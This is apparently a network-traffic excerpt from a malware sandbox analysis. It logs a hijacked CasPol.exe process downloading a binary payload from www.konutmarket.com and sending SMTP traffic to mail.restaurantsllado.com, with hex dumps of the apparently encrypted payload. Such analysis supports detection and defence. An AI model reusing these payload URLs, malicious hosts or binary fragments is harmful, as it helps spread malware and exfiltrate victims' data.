                                                                                                                    Jan 28, 2022 23:09:04.618407011 CET49803443192.168.11.20178.18.206.58
                                                                                                                    Jan 28, 2022 23:09:04.618419886 CET49803443192.168.11.20178.18.206.58
                                                                                                                    Jan 28, 2022 23:09:04.618423939 CET49803443192.168.11.20178.18.206.58
                                                                                                                    Jan 28, 2022 23:09:04.618427038 CET49803443192.168.11.20178.18.206.58
                                                                                                                    Jan 28, 2022 23:09:04.618500948 CET49803443192.168.11.20178.18.206.58
                                                                                                                    Jan 28, 2022 23:09:04.620068073 CET44349803178.18.206.58192.168.11.20
                                                                                                                    Jan 28, 2022 23:09:04.620274067 CET49803443192.168.11.20178.18.206.58
                                                                                                                    Jan 28, 2022 23:09:04.620290995 CET49803443192.168.11.20178.18.206.58
                                                                                                                    Jan 28, 2022 23:09:04.620368958 CET49803443192.168.11.20178.18.206.58
                                                                                                                    Jan 28, 2022 23:09:04.621999025 CET44349803178.18.206.58192.168.11.20
                                                                                                                    Jan 28, 2022 23:09:04.622201920 CET49803443192.168.11.20178.18.206.58
                                                                                                                    Jan 28, 2022 23:09:04.622214079 CET49803443192.168.11.20178.18.206.58
                                                                                                                    Jan 28, 2022 23:09:04.622217894 CET49803443192.168.11.20178.18.206.58
                                                                                                                    Jan 28, 2022 23:09:04.622248888 CET49803443192.168.11.20178.18.206.58
                                                                                                                    Jan 28, 2022 23:09:04.622970104 CET44349803178.18.206.58192.168.11.20
                                                                                                                    Jan 28, 2022 23:09:04.623135090 CET49803443192.168.11.20178.18.206.58
                                                                                                                    Jan 28, 2022 23:09:04.623197079 CET49803443192.168.11.20178.18.206.58
                                                                                                                    Jan 28, 2022 23:09:04.624025106 CET44349803178.18.206.58192.168.11.20
                                                                                                                    Jan 28, 2022 23:09:04.624099970 CET44349803178.18.206.58192.168.11.20
                                                                                                                    Jan 28, 2022 23:09:04.624351978 CET49803443192.168.11.20178.18.206.58
                                                                                                                    Jan 28, 2022 23:09:04.624366999 CET49803443192.168.11.20178.18.206.58
                                                                                                                    Jan 28, 2022 23:09:04.739798069 CET49803443192.168.11.20178.18.206.58
                                                                                                                    Jan 28, 2022 23:09:04.739829063 CET44349803178.18.206.58192.168.11.20
                                                                                                                    Jan 28, 2022 23:09:04.739834070 CET49803443192.168.11.20178.18.206.58
                                                                                                                    Jan 28, 2022 23:09:04.739978075 CET49803443192.168.11.20178.18.206.58
                                                                                                                    Jan 28, 2022 23:10:55.252341986 CET49830587192.168.11.2046.16.58.183
                                                                                                                    Jan 28, 2022 23:10:55.282746077 CET5874983046.16.58.183192.168.11.20
                                                                                                                    Jan 28, 2022 23:10:55.282998085 CET49830587192.168.11.2046.16.58.183
                                                                                                                    Jan 28, 2022 23:10:55.464364052 CET5874983046.16.58.183192.168.11.20
                                                                                                                    Jan 28, 2022 23:10:55.464689016 CET49830587192.168.11.2046.16.58.183
                                                                                                                    Jan 28, 2022 23:10:55.494631052 CET5874983046.16.58.183192.168.11.20
                                                                                                                    Jan 28, 2022 23:10:55.494700909 CET5874983046.16.58.183192.168.11.20
                                                                                                                    Jan 28, 2022 23:10:55.495059013 CET49830587192.168.11.2046.16.58.183
                                                                                                                    Jan 28, 2022 23:10:55.524951935 CET5874983046.16.58.183192.168.11.20
                                                                                                                    Jan 28, 2022 23:10:55.527901888 CET49830587192.168.11.2046.16.58.183
                                                                                                                    Jan 28, 2022 23:10:55.561041117 CET5874983046.16.58.183192.168.11.20
                                                                                                                    Jan 28, 2022 23:10:55.561086893 CET5874983046.16.58.183192.168.11.20
                                                                                                                    Jan 28, 2022 23:10:55.561131954 CET5874983046.16.58.183192.168.11.20
                                                                                                                    Jan 28, 2022 23:10:55.561155081 CET5874983046.16.58.183192.168.11.20
                                                                                                                    Jan 28, 2022 23:10:55.561337948 CET49830587192.168.11.2046.16.58.183
                                                                                                                    Jan 28, 2022 23:10:55.591217041 CET5874983046.16.58.183192.168.11.20
                                                                                                                    Jan 28, 2022 23:10:55.597778082 CET49830587192.168.11.2046.16.58.183
                                                                                                                    Jan 28, 2022 23:10:55.628123045 CET5874983046.16.58.183192.168.11.20
                                                                                                                    Jan 28, 2022 23:10:55.668523073 CET49830587192.168.11.2046.16.58.183
                                                                                                                    Jan 28, 2022 23:10:57.569534063 CET49830587192.168.11.2046.16.58.183
                                                                                                                    Jan 28, 2022 23:10:57.599948883 CET5874983046.16.58.183192.168.11.20
                                                                                                                    Jan 28, 2022 23:10:57.601733923 CET49830587192.168.11.2046.16.58.183
                                                                                                                    Jan 28, 2022 23:10:57.631887913 CET5874983046.16.58.183192.168.11.20
                                                                                                                    Jan 28, 2022 23:10:57.632311106 CET49830587192.168.11.2046.16.58.183
                                                                                                                    Jan 28, 2022 23:10:57.664731026 CET5874983046.16.58.183192.168.11.20
                                                                                                                    Jan 28, 2022 23:10:57.665306091 CET49830587192.168.11.2046.16.58.183
                                                                                                                    Jan 28, 2022 23:10:57.696994066 CET5874983046.16.58.183192.168.11.20
                                                                                                                    Jan 28, 2022 23:10:57.697302103 CET49830587192.168.11.2046.16.58.183
                                                                                                                    Jan 28, 2022 23:10:57.731296062 CET5874983046.16.58.183192.168.11.20
                                                                                                                    Jan 28, 2022 23:10:57.731636047 CET49830587192.168.11.2046.16.58.183
                                                                                                                    Jan 28, 2022 23:10:57.762059927 CET5874983046.16.58.183192.168.11.20
                                                                                                                    Jan 28, 2022 23:10:57.808665037 CET49830587192.168.11.2046.16.58.183
                                                                                                                    Jan 28, 2022 23:10:57.911317110 CET49830587192.168.11.2046.16.58.183
                                                                                                                    Jan 28, 2022 23:10:57.911355019 CET49830587192.168.11.2046.16.58.183
                                                                                                                    Jan 28, 2022 23:10:57.911402941 CET49830587192.168.11.2046.16.58.183
                                                                                                                    Jan 28, 2022 23:10:57.911452055 CET49830587192.168.11.2046.16.58.183
                                                                                                                    Jan 28, 2022 23:10:57.941481113 CET5874983046.16.58.183192.168.11.20
                                                                                                                    Jan 28, 2022 23:10:57.941504002 CET5874983046.16.58.183192.168.11.20
                                                                                                                    Jan 28, 2022 23:10:58.046367884 CET5874983046.16.58.183192.168.11.20
                                                                                                                    Jan 28, 2022 23:10:58.089843035 CET49830587192.168.11.2046.16.58.183
                                                                                                                    Jan 28, 2022 23:12:35.146692038 CET49830587192.168.11.2046.16.58.183
                                                                                                                    Jan 28, 2022 23:12:35.177118063 CET5874983046.16.58.183192.168.11.20
                                                                                                                    Jan 28, 2022 23:12:35.177752018 CET49830587192.168.11.2046.16.58.183
                                                                                                                    Jan 28, 2022 23:12:35.178657055 CET5874983046.16.58.183192.168.11.20
                                                                                                                    Jan 28, 2022 23:12:35.178900003 CET49830587192.168.11.2046.16.58.183
                                                                                                                    Jan 28, 2022 23:12:35.207761049 CET5874983046.16.58.183192.168.11.20
                                                                                                                    Jan 28, 2022 23:12:35.207905054 CET49830587192.168.11.2046.16.58.183
                                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                                    Jan 28, 2022 23:09:03.724997997 CET6387353192.168.11.201.1.1.1
                                                                                                                    Jan 28, 2022 23:09:04.050427914 CET53638731.1.1.1192.168.11.20
                                                                                                                    Jan 28, 2022 23:10:55.115123034 CET5885253192.168.11.201.1.1.1
                                                                                                                    Jan 28, 2022 23:10:55.134660006 CET53588521.1.1.1192.168.11.20
                                                                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                                    Jan 28, 2022 23:09:03.724997997 CET192.168.11.201.1.1.10x7ce5Standard query (0)www.konutmarket.comA (IP address)IN (0x0001)
                                                                                                                    Jan 28, 2022 23:10:55.115123034 CET192.168.11.201.1.1.10x3aceStandard query (0)mail.restaurantsllado.comA (IP address)IN (0x0001)
                                                                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                                    Jan 28, 2022 23:09:04.050427914 CET1.1.1.1192.168.11.200x7ce5No error (0)www.konutmarket.comkonutmarket.comCNAME (Canonical name)IN (0x0001)
                                                                                                                    Jan 28, 2022 23:09:04.050427914 CET1.1.1.1192.168.11.200x7ce5No error (0)konutmarket.com178.18.206.58A (IP address)IN (0x0001)
                                                                                                                    Jan 28, 2022 23:10:55.134660006 CET1.1.1.1192.168.11.200x3aceNo error (0)mail.restaurantsllado.com46.16.58.183A (IP address)IN (0x0001)
                                                                                                                    • www.konutmarket.com
                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                    0192.168.11.2049803178.18.206.58443C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                    2022-01-28 22:09:04 UTC0OUTGET /2022file_izNuHdosu25.bin HTTP/1.1
                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                    Host: www.konutmarket.com
                                                                                                                    Cache-Control: no-cache
                                                                                                                    2022-01-28 22:09:04 UTC0INHTTP/1.1 200 OK
                                                                                                                    Date: Fri, 28 Jan 2022 22:09:03 GMT
                                                                                                                    Server: Apache
                                                                                                                    Upgrade: h2,h2c
                                                                                                                    Connection: Upgrade, close
                                                                                                                    Last-Modified: Thu, 27 Jan 2022 07:15:45 GMT
                                                                                                                    Accept-Ranges: bytes
                                                                                                                    Content-Length: 221760
                                                                                                                    Vary: User-Agent
                                                                                                                    Content-Type: application/octet-stream
                                                                                                                    2022-01-28 22:09:04 UTC0INData Raw: 8f f3 7f 3e eb 45 c9 6f ef 60 35 3e 22 e4 3a b3 31 62 f5 24 39 84 06 aa c6 98 9c 61 a0 68 2d 07 b7 02 42 ec e9 f6 d2 cd 49 b7 41 b2 d9 1f b9 05 7f fa 8a bb 2f 95 9c b4 2a 89 0a 8c e7 32 df 79 b7 25 3e 57 59 1a 32 6a 75 c6 25 88 b0 8c c6 c4 87 36 b3 7c e6 20 bb 1f a5 32 32 71 8c da 87 dc 9d 4f b1 81 95 bc a8 1a db ae 1f 8a 25 bc 4e 39 1f 9e a5 0b 2f 01 e6 7c bc 21 99 d9 83 38 76 f9 76 69 b5 2e 5e c8 70 b6 f7 c0 ae 17 9a 3c 31 a1 f6 ef e8 59 5c c3 93 85 aa a6 52 a1 ae b4 6e 32 86 21 ef 18 fe 7a ab a6 08 c6 a5 c6 3f 76 01 f7 07 e8 ad 70 22 7d 43 2d 34 29 10 eb 55 d4 7c 5f 8c 5d 24 87 b9 38 8a a4 2d e3 78 86 f5 46 04 99 11 2b e9 18 fd e6 be 64 65 9d b1 a0 db 0b e1 01 ff 99 da 2a 88 97 a1 bc a4 af 12 d8 90 19 07 ce 67 bd a0 1c 74 04 c7 94 68 cd 46 55 68 98 71
                                                                                                                    Data Ascii: >Eo`5>":1b$9ah-BIA/*2y%>WY2ju%6| 22qO%N9/|!8vvi.^p<1Y\Rn2!z?vp"}C-4)U|_]$8-xF+de*gthFUhq
                                                                                                                    2022-01-28 22:09:04 UTC8INData Raw: 50 32 17 6a 71 cc 0d 13 4f 73 cc ec 79 34 b3 7a ce bb bb 1f ef 1a 14 71 8c d0 af 47 9d 4f bb a9 09 bc a8 10 f1 ae 1f 91 15 be 4e 22 1f 9e a5 0b 2f 01 e6 6b 94 0f 9b d9 05 10 4c f9 78 70 29 fe 52 54 4e 7b d6 72 87 63 57 1d 6f 17 9f b6 c8 28 3e ac f4 f7 cb cb 72 cc c1 da 0c 47 f2 01 8c 66 ee 0a de d5 28 af cb f9 7b 39 43 c1 42 a9 cb 15 0a 58 74 27 10 2f 36 35 5b f1 54 68 dc 18 2e 8d dd 01 89 a4 c6 89 91 cd f5 46 04 98 01 2b e9 18 1d e6 bc 6b 60 9c b4 ba db 53 e3 1a cf 92 da 81 88 97 a1 9c da d9 00 c0 b8 17 05 ce 61 95 9a 1c 74 02 8d 92 40 96 44 55 6e f5 ec 04 f8 13 32 c7 4e 40 93 a3 e4 f5 70 78 3c 5b 21 a7 71 53 53 62 bb 0d 41 79 59 31 18 e6 98 1f 8d a1 ea 7b a6 bd 3d 97 ef e1 fd 4d 26 45 e3 00 2c 73 95 e4 fd ba 41 2e 66 53 39 24 7b 4b f1 e2 af 44 bf 83 a5
                                                                                                                    Data Ascii: P2jqOsy4zqGON"/kLxp)RTN{rcWo(>rGf({9CBXt'/65[Th.F+k`Sat@DUn2N@px<[!qSSbAyY1{=M&E,sA.fS9${KD
                                                                                                                    2022-01-28 22:09:04 UTC15INData Raw: 77 4a e6 bc 6f b2 8d b1 cf 23 53 e2 0b 21 9d cb 21 a4 90 b0 b7 b5 8e 11 d8 9a e5 16 c4 08 4a a0 1c 7e 15 8d fb 15 ed 46 5f b6 96 60 0e d4 1e 1a 4d 21 17 93 dd d2 29 0e 68 14 27 27 8b 42 55 3b 24 93 0c 4b 55 4b ca 18 e0 fd ad 94 b0 e7 de 82 94 0a 93 f7 84 2f 75 26 4f f8 d9 57 25 a8 e4 f9 df 92 66 64 59 e1 3f 3c 41 f1 e2 af 44 ce 81 a5 23 b6 43 38 76 6b 3a 36 b7 cc 1c a6 21 14 01 b2 aa 79 ab 4c 40 70 f8 b5 2d b5 f2 e9 b4 f4 3e a8 10 31 dc ac a0 d6 bd af 14 3b 1c 5c fd ab 0b 86 4e cc a9 77 f1 18 a4 76 cf 49 38 80 45 3a 7f 5c 15 4e 11 90 18 1c 2e b8 65 02 5e 57 31 b3 ab 43 75 5c b3 0e 23 db 28 ba 68 9b b9 a7 95 8f 95 a6 d1 f6 75 51 51 ce 7f 21 b9 c4 5b 50 38 60 56 a4 61 32 f7 1f 59 27 51 d8 07 2d cd cd c1 ea 8c 27 60 3c a2 57 95 86 3c fd 33 e0 06 d0 f0 0b 74
                                                                                                                    Data Ascii: wJo#S!!J~F_`M!)h''BU;$KUK/u&OW%fdY?<AD#C8vk:6!yL@p->1;\NwvI8E:\N.e^W1Cu\#(huQQ![P8`Va2Y'Q-'`<W<3t
                                                                                                                    2022-01-28 22:09:04 UTC23INData Raw: 65 1b 20 d1 a9 cf ff bc 70 1f 2a 11 49 92 81 0a 86 44 dd a4 1a da 19 a4 b8 df 4d 2e a6 41 b4 c8 c8 38 4f 11 96 0b 08 3f ac eb b5 4d 47 20 a1 b4 e8 ae 4d bd 81 30 c8 39 a4 7d 41 ae 7d 18 a4 95 a6 d0 e5 64 42 45 df 6d 96 ab 1e 4a c7 2e 71 47 06 d4 1a e5 12 59 2d 22 fd 06 2d c7 de d4 fb 99 09 73 53 80 7f 95 8c 2f 83 20 f6 2e cb f1 0b 7e 80 45 eb b7 4e 77 13 c4 b8 7d 53 50 2c 6a 3f 00 83 57 14 78 33 2b eb 53 77 14 48 5d 36 c6 60 18 50 46 b7 d7 10 b1 71 58 a5 6f 8c bd 3c e2 42 4d b6 33 00 64 be e2 04 65 ff 11 4c d3 76 da e6 7e bc 14 83 5f 3d 7e f1 7a 95 40 75 ab 80 0f 31 dc 8c c3 df 80 99 0f 58 dd c4 ca 1d 1c d8 b8 1b 2c 08 ec 7b 41 c5 38 49 c4 67 36 92 dc 84 f4 ac 21 7e f2 4a 0f dd 9c c0 c2 a3 14 f9 12 ce 06 e4 e2 d9 f9 d7 24 76 be 6b 97 6d 79 1f 89 f1 a6 07
                                                                                                                    Data Ascii: e p*IDM.A8O?MG M09}A}dBEmJ.qGY-"-sS/ .~ENw}SP,j?Wx3+SwH]6`PFqXo<BM3deLv~_=~z@u1X,{A8Ig6!~J$vkmy
                                                                                                                    2022-01-28 22:09:04 UTC31INData Raw: 2d 52 6e a5 f4 08 a0 d1 49 be 70 cd 95 1c f2 54 4b 8d e6 21 65 be e8 1f 65 10 09 71 d3 67 99 e7 7e b2 2f 80 4d 2e 6f 55 0f 43 cd 5a 83 a7 0e 22 cb 1d b4 ce 92 8c 06 8e cc d1 cb f2 0e dc a8 02 20 02 f5 7d cc e5 15 4e e6 da 2c 83 c0 8e e5 c3 0b 67 0c 41 30 cf ab fc 4e 88 1e 79 71 dd 1e f1 ef ca e9 ce 20 9e ae 5f 11 f2 fe 0d 88 f7 a7 0b 40 10 c3 50 ba eb a0 8a af 06 a1 41 75 5c b8 8f 59 01 ec 37 59 1a 5c 1e 3a c3 44 07 14 9d 9d 12 a9 16 aa 44 ad 19 1f 88 4e 4b a9 ea a2 23 64 b5 d8 1c 23 d0 67 aa 72 b1 45 a4 b1 11 cb 08 64 d7 2a 59 f8 03 61 81 73 cb aa 1d 87 10 40 15 2c 76 e5 e6 05 60 8f 60 27 39 81 6a 0d 75 25 d9 0d df 0c 62 5e a9 11 72 33 72 26 1a fb d0 88 da 49 ab c6 87 9e 31 67 a2 9e 51 65 aa d2 b6 bc 78 f1 ac 29 04 61 da 43 74 59 0b 56 9d e2 83 9d c7 41
                                                                                                                    Data Ascii: -RnIpTK!eeqg~/M.oUCZ" }N,gA0Nyq _@PAu\Y7Y\:DDNK#d#grEd*Yas@,v``'9ju%b^r3r&I1gQex)aCtYVA
                                                                                                                    2022-01-28 22:09:04 UTC39INData Raw: 12 a9 1a 9e d9 ae 11 07 5e 6b 67 a7 9e e9 88 65 b1 c5 5b f2 d0 67 aa 72 a2 61 1f b9 07 3f 21 d9 d6 3d 53 d0 2f 7e 88 87 e2 a9 1f ac 1f 54 5c d4 96 00 c9 94 7b bf 6e 0f 22 81 6a 0b 0f 01 d9 1c fd 10 ca 5f af 10 6e a9 72 26 1a f6 b9 0d ee 4a a1 d3 f5 c7 30 66 a6 b6 c4 6b 82 7a 9f 02 72 fc af 6e 66 60 da 4f 61 75 b6 4e b5 5f fd fd cd 69 11 4c f8 22 3b 2a 18 bd 0d 30 de 52 88 a9 12 ae 86 44 3b 31 e3 fa 77 be ac a6 aa 79 cf 81 9d 90 4a 45 da 66 db 6a 5a d3 e6 17 9f d0 18 fe fe 39 0e 9e 6a 06 16 83 7e 20 7f a5 da 94 12 ae d9 30 4b e3 7d d6 58 4d 50 77 b5 67 46 76 c9 a2 d7 d5 2b f7 6f b7 a9 d0 9c e6 ac 3d a9 78 82 2a c0 70 18 62 8a 0d d5 99 d6 68 27 ca e9 e2 8f 24 d3 ce 83 a8 f3 cc 93 5c 96 84 27 42 b0 31 d8 21 81 01 15 90 cf e6 be 1c 9a 9f 47 90 01 3f 85 fd 57
                                                                                                                    Data Ascii: ^kge[gra?!=S/~T\{n"j_nr&J0fkzrnf`OauN_iL";*0RD;1wyJEfjZ9j~ 0K}XMPwgFv+o=x*pbh'$\'B1!G?W
                                                                                                                    2022-01-28 22:09:04 UTC47INData Raw: 32 4a 45 da 77 d6 05 98 d3 e6 1d b1 4c 18 fe ec 2b 09 8f 73 2f 09 80 6b 26 6e a1 d4 bc 81 ac c2 06 5e 6e 3a d7 58 4c 35 63 a1 5e 96 cc c9 a8 b2 ca 55 cb 65 9f 84 f8 45 ef bf 3d af 11 97 1b c0 7a 3f 49 ee 2e 26 84 d7 6e 36 12 d5 4c a6 13 d9 a1 05 ba f7 c0 b0 20 ae 84 21 5b 64 29 df 09 bc 7e 29 9a de e5 e2 d7 99 9f 5a af 38 02 85 fb 4e ed b6 bc bf 39 42 a9 a6 da f3 2e f8 15 a9 06 10 bf 1c 24 fd 6f 2e 10 44 bf 29 db 95 44 cb fc f5 45 b2 78 e8 a7 e2 18 a0 2c 2b f0 68 c1 6a 5a 1a 38 79 77 ee 31 89 4f 79 d7 c2 17 ed b0 7c e0 4f 09 1e e5 38 46 63 8c da 9c b3 8b 4e b1 8b 86 b7 b9 1c f3 72 1c 8a 23 d3 fc 38 1f 94 d1 19 2f 01 fd 6f bb 30 9f f1 de 3b 76 ff 17 c4 0e 20 54 08 6b 7b d6 63 bc 53 45 15 74 c1 11 2b df f3 06 aa f4 f7 e0 da 75 d3 c7 f2 e0 5d f2 07 9e 74 ad
                                                                                                                    Data Ascii: 2JEwL+s/k&n^n:XL5c^UeE=z?I.&n6L ![d)~)Z8N9B.$o.D)DEx,+hjZ8yw1Oy|O8FcNr#8/o0;v Tk{cSEt+u]t
                                                                                                                    2022-01-28 22:09:04 UTC55INData Raw: f5 c7 b3 78 e8 d9 cf 32 84 2a 3a f2 6e a8 38 7e 18 32 6c 60 ce 34 8c 67 71 c7 c4 39 59 95 7e e6 26 aa 17 cd 76 36 71 8a b5 ad de 9d 49 b6 90 9d d3 b0 1b db a4 c1 df 56 9e 4c 39 19 8d ac 1a 26 29 be 7e bc 27 f6 f1 01 38 70 e8 71 67 08 4f 7a 7e 79 7d c7 71 be 5e 7f 1f 64 c9 99 f3 ee 2b 2e aa e5 fe e3 8f 76 c2 c9 b5 2a 5f f2 07 8a 6c d7 67 c6 c9 28 a5 15 f3 5e 11 65 d7 6a 8d da 1f 7f ca 4e 27 1a 25 38 d3 55 d4 76 81 de 1f 0e 8f df 39 89 a4 8d 4b 91 e7 f5 46 04 99 03 2b e9 18 0b e7 bc 65 46 9d ba a0 ce 53 e2 01 e5 91 da 2b 9b a7 a5 bc ee d8 11 d8 11 39 07 df 71 ae ab 24 e6 04 87 94 68 fc 4d 42 96 9b 5d 07 e0 0a 00 47 5f 4b 8a 23 d9 d9 79 5a 3a 25 23 a1 5d 5e 2f 54 bb 1c 40 49 da 32 34 ee f5 ee 44 a1 e0 af b0 c8 1c b9 e4 f2 c6 7e 26 54 e2 c4 d2 0c 85 a7 dd b0
                                                                                                                    Data Ascii: x2*:n8~2l`4gq9Y~&v6qIVL9&)~'8pqgOz~y}q^d+.v*_lg(^ejN'%8Uv9KF+eFS+9q$hMB]G_K#yZ:%#]^/T@I24D~&T
                                                                                                                    2022-01-28 22:09:04 UTC62INData Raw: f2 24 77 a5 e0 52 ba 83 eb 55 03 99 00 2c f1 e6 1c ca b5 4d 16 98 ba a6 d1 4a f1 06 ff 80 dd 35 82 69 a0 90 d6 d1 18 f0 b4 39 07 c4 6b a2 ab 0f 73 04 96 93 74 13 47 79 64 8b 74 6b 31 19 0b 4d 5d 46 8e ce df f5 61 75 03 d9 22 8b 74 5c 2f 58 bb 1c 4c 4e 2f cd 19 cc fd 90 89 b6 36 b6 ae 8a 06 84 e8 eb c4 72 39 49 17 df 00 07 b8 e0 ec b6 5b 5f 7b 5e 2c 34 14 67 f6 fb 5b 6d da 88 8d 07 6a 43 e0 75 54 01 06 b7 dd 11 ae d1 3d 15 b4 bc 60 71 50 54 5d f8 e5 be af 0c ea 98 f2 3c 76 14 2a cf b9 a0 c7 ba 6e eb 3a 30 43 ec ae 1a 82 21 2d a8 75 fb 30 70 b3 ce 43 35 a8 4c 29 78 a7 05 49 07 62 19 30 2d af 76 05 5e 44 36 ac a6 06 75 70 b1 70 26 e3 22 55 95 64 b1 81 8e bf 90 a6 9f f7 75 53 de ce 7f 96 cb a6 5a d6 32 73 50 99 65 5d 03 12 59 2d 2f bf 07 2d c9 43 76 e8 02 af
                                                                                                                    Data Ascii: $wRU,MJ5i9kstGydtk1M]Fau"t\/XLN/6r9I[_{^,4g[mjCuT=`qPT]<v*n:0C!-u0pC5L)xIb0-v^D6upp&"UduSZ2sPe]Y-/-Cv
                                                                                                                    2022-01-28 22:09:04 UTC70INData Raw: b9 79 5d ff 43 5a fe 87 3d b4 f2 e1 a7 fc 2f 6d 00 37 b3 0b a1 d6 b7 1f 92 3a 1c 5a ea c4 83 87 4e c6 c6 fc f0 18 ae a1 c9 3a 1a b5 45 3c 6c ae 05 47 00 96 77 38 2c b8 63 13 57 44 36 dc 8d fa 74 5a a2 52 0b 6f 2c aa 6c f4 93 a9 95 89 84 af f9 ae 77 53 57 a1 57 85 b8 c2 5d c7 31 0f 4e 89 63 38 29 06 7c 0f 66 d8 07 27 de c1 b2 50 8c 18 68 37 8a 46 95 86 36 4b 33 e6 2c db da 0b 74 a9 0d e9 b7 48 5f 0d c6 59 6a 3d 3d 36 6a 35 12 8f 6e 30 76 9d 2b eb 13 97 14 48 4c 01 41 ed 33 5a 44 9e a2 0a a0 6f 5d a9 58 0e 94 1c e9 2d 51 b4 40 2b 6f 60 fa 3f 4b ee 08 57 e0 37 fa e7 78 bc 2f a7 4e 2e 63 f5 6d 45 e7 5e ab 81 1e 22 c1 9d d7 ce 92 92 06 82 de c3 dc 0c 0e eb 9a 1e 2c 21 fd 67 32 c4 39 49 df 5c bb 83 c6 9f eb d7 15 57 60 41 1c c9 ec 96 4e 88 1e f3 cd d1 36 c2 f6
                                                                                                                    Data Ascii: y]CZ=/m7:ZN:E<lGw8,cWD6tZRo,lwSWW]1Nc8)|f'Ph7F6K3,tH_Yj==6j5n0v+HLA3ZDo]X-Q@+o`?KW7x/N.cmE^",!g29I\W`AN6
                                                                                                                    2022-01-28 22:09:04 UTC78INData Raw: 94 5e 30 67 b4 ba e3 04 6d 09 17 39 fb f6 12 33 50 46 be db 14 ff 06 16 0a ec 8d 92 09 35 51 40 a4 47 30 6d 91 6f 06 79 f8 20 66 c9 19 f2 cd 6d 86 05 9f 64 2e 69 2b 68 43 cd 4f bd 8b 25 39 c1 9a c0 30 93 a4 1e 9a c7 d9 db 1a f1 f1 86 18 3b 09 fd 60 2a 1a 38 65 cc 5f 2e a8 25 96 fe a9 5c 68 98 be 1d e9 83 80 5c b8 10 f9 63 dd 1e f5 42 c6 e9 d7 2a 73 ab 58 5d da 40 09 90 0f ad 3a 42 14 d5 b3 46 ee 9a 7a d0 05 8d 72 68 67 93 8f 48 0f d7 f4 46 3a 5f 0e 32 39 45 3a 17 ac d3 13 85 16 a0 22 87 0b 12 72 4f 76 a3 82 3f 22 48 b2 d8 27 5a d1 76 a4 77 46 48 88 bb 2c 37 22 f2 c3 57 5e ee 0f 69 52 80 c6 ad 0b ab 0b 1a 42 a8 4f 1a e1 2b 78 b7 b2 b6 dd e2 61 05 30 f3 d5 14 fe 09 89 59 85 09 31 03 73 52 1c f1 d6 15 ef 4a ba d6 ea f0 09 01 aa b6 d6 67 bb db 89 fc 79 dd a5
                                                                                                                    Data Ascii: ^0gm93PF5Q@G0moy fmd.i+hCO%90;`*8e_.%\h\cB*sX]@:BFzrhgHF:_29E:"rOv?"H'ZvwFH,7"W^iRBO+xa0Y1sRJgy
                                                                                                                    2022-01-28 22:09:04 UTC86INData Raw: 6f 0b c0 0e b9 17 4f 11 30 3a 69 20 3b 9b 2f 12 af 63 e0 4a ad 1b 7b 67 44 71 59 97 d2 2b 75 b9 e3 23 76 ff 65 a0 6b a9 42 28 c2 07 35 08 60 ce 3c 55 f2 78 28 8a 8d c0 fc c1 a2 07 74 be c5 c4 1a e1 2d 14 e8 64 27 b9 5e 63 25 4b 25 d9 1a d1 29 65 76 f8 18 01 0f 7b 30 38 99 d6 a0 e9 6c ba c5 d3 ff 30 77 a6 b6 d4 67 9a d4 22 ee 78 ff a6 46 3e 60 c9 79 76 71 38 54 9d e4 bb fd c7 50 95 42 c0 59 13 0e 18 bd 0e 05 aa 52 a4 ab 09 b2 90 5c de c6 fd f7 76 d8 75 58 ab 5f d3 8e a6 4c 65 45 da 73 b9 99 99 d3 e0 16 ae 41 18 f7 ef d4 08 a3 65 26 1e 87 65 b7 f2 bd c3 bc 88 b1 27 37 71 66 72 ce 5f 50 d5 ff bc 42 e5 7f de 56 b9 ec 29 ef 68 9f 87 c9 62 ed 93 32 a2 f3 81 1b c0 71 1e 54 e5 25 f2 81 28 6f 1a c4 c9 7f 89 3e 48 3d 14 a4 f3 cf ad f6 97 a8 23 46 b4 20 d7 17 42 01
                                                                                                                    Data Ascii: oO0:i ;/cJ{gDqY+u#vekB(5`<Ux(t-d'^c%K%)ev{08l0wg"xF>`yvq8TPBYR\vuX_LeEsAe&e'7qfr_PBV)hb2qT%(o>H=#F B
                                                                                                                    2022-01-28 22:09:04 UTC94INData Raw: 19 f6 f7 8d 8d 7f 70 bf e8 c9 79 72 dc 8a ba 22 59 40 da 66 d3 12 66 d2 ca 1e af 5f 1d fe e5 2f 14 71 6c 02 1d 96 7c 5d 62 a0 ce b8 ee 27 db 36 57 79 a0 c5 5c 40 5a 70 a4 4f f4 73 d6 ba 46 c1 07 fb 67 e4 80 d1 9c e8 93 24 a7 6d b9 1e c0 61 17 58 16 24 d7 98 c1 7d 33 cc d0 6c 91 33 27 a0 23 ab d8 c3 83 ee 6b 7b de 7b b9 33 ee 0c bc 05 17 9a de 37 ca 0e 8b 9d 27 a8 56 3f 81 d6 4f c9 7c d7 0e 3e 31 20 a9 d3 ea 5a 9d 79 a6 3e d8 b3 0a 2e d4 b4 3e 1d de ae 57 b5 a8 44 cf f0 f5 8e b0 78 e4 a5 f7 21 94 42 0b aa 34 af 55 30 5a f5 6b 71 c6 27 f3 5f 72 c6 c0 39 28 65 54 6d 22 bb 15 c5 32 3a 71 8c 85 91 22 9c 59 4f 80 86 bb aa 61 cb af 1f 8e 23 a3 44 ef 37 15 a7 0b 25 12 eb 7e c7 31 98 d9 07 3e 69 f5 ae 5e 1e 21 5e 76 6a 75 d4 03 bf 5a 57 19 63 d6 8f 4a e0 38 2f ac
                                                                                                                    Data Ascii: pyr"Y@ff_/ql|]b'6Wy\@ZpOsFg$maX$}3l3'#k{{37'V?O|>1 Zy>.>WDx!B4U0Zkq'_r9(eTm"2:q"YOa#D7%~1>i^!^vjuZWcJ8/
